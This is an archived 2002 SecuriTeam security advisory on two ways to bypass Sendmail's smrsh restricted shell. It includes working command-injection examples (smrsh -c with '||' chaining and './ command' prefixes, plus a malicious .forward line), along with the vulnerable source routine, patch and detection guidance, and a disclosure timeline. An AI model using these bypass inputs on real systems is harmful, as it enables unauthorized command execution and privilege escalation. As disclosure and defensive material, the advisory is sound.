[UNIX] Sendmail smrsh Bypass Vulnerabilities
From: support@securiteam.comDate: 10/01/02
- Previous message: support@securiteam.com: "[NT] BearShare Directory Traversal Issue Resurfaces"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 1 Oct 2002 21:39:27 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Sendmail smrsh Bypass Vulnerabilities
------------------------------------------------------------------------
SUMMARY
It is possible for an attacker to bypass the restrictions imposed by The
Sendmail Consortium's Restricted Shell (SMRSH) and execute a binary of his
choosing by inserting a special character sequence into his .forward file.
SMRSH is an application intended as a replacement for sh for use in
Sendmail. There are two attack methods both of which are detailed below.
DETAILS
Vulnerable systems:
* Sendmail version 8.12.6
* Sendmail version 8.11.6-15
Method one:
This method takes advantage of the application's implementation of the
'||' command. The process is best explained with an example:
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
/tmp/unauth is executed despite the fact that it is not located in the
SMRSH restricted directory /etc/smrsh. This happens because SMRSH first
checks for '.', which exists, and does no further verification on the
files listed after '||'. The same attack would look like the following in
the attackers .forward file:
"| . \|| . /tmp/unauth \|| ."
Method two:
This method takes advantage of the following routine from smrsh.c:
/* search backwards for last / (allow for 0200 bit) */
while (cmd > q)
{
if ((*--cmd & 0177) == '/')
{
cmd++;
break;
}
}
It is possible to feed SMRSH a command line that will be internally
converted to a space thereby bypassing all filters, yet will still
execute. Examples of these include:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
The listed routine will convert any of the above examples to a space.
However, when the following execle() call is reached:
(void) execle("/bin/sh", "/bin/sh", "-c", newcmdbuf, NULL, newenv);
SMRSH will execute:
/bin/sh -c command
Notice that despite the double space 'command' will still execute. The
forward variation of this attack works the same way.
Analysis:
The following are required conditions for successful and meaningful
exploitation of this vulnerability:
* The target system must be utilizing SMRSH.
* The attacker must have a valid local account on the system.
* In method one the attacker must be able to create files.
While this exploit obviously removes the restrictions imposed by SMRSH, it
also allows users to execute programs on systems that they do not have
shell access to. Utilizing either of the above-described methods, an
attacker who can modify his own .forward file can execute arbitrary
commands on the target system with the privileges of his own account.
Systems that forbid shell access generally do not have tightened local
security the ability to execute arbitrary commands through the SMRSH
vulnerability opens the target system to local privilege escalation
attacks that otherwise would not be possible.
Detection:
The latest versions of SMRSH are vulnerable. Including the version
packaged with Sendmail 8.12.6 and Sendmail 8.11.6-15 (default install of
RedHat 7.3). Older versions of SMRSH do not appear to be vulnerable (8.11
5/19/1998). The version of SMRSH available at
<ftp://ftp.uu.net/pub/security/smrsh> ftp://ftp.uu.net/pub/security/smrsh
is also not vulnerable.
Workaround:
Sendmail.org has provided a patch addressing the above-described issues.
The patch is available for download at:
<http://www.sendmail.org/patches/smrsh-20020924.patch>
http://www.sendmail.org/patches/smrsh-20020924.patch.
Vendor fix/Response:
Sendmail.org's official comment:
"We would like to thank iDEFENSE, zen-parse, and Pedram Amini for bringing
these problems to our attention.
If you actually use a vulnerable smrsh version (which can be tested
according to the descriptions given before), please apply the patch that
has been made available. To figure out whether your configuration uses
smrsh, check your sendmail.mc file, i.e., look for
FEATURE(`smrsh')
And check your sendmail.cf file (usually located in /etc/mail or /etc):
grep '^Mprog.*smrsh' sendmail.cf
Also consider whether you actually need this feature, e.g., if you make
procmail available to your users then smrsh is basically useless."
Disclosure timeline:
9/1/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to sendmail-bugs@sendmail.org
9/24/2002 Disclosed to iDEFENSE clients
9/24/2002 Response from Greg Shapiro gshapiro@sendmail.org
9/25/2002 Coordination from Claus Assmann ca@sendmail.org
10/1/2002 Public Coordinated Disclosure
ADDITIONAL INFORMATION
Method One was exclusively disclosed to iDEFENSE by
<mailto:zen-parse@gmx.net> zen-parse.
Method Two was discovered during the verification process by
<mailto:pamini@idefense.com> Pedram Amini.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] BearShare Directory Traversal Issue Resurfaces"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
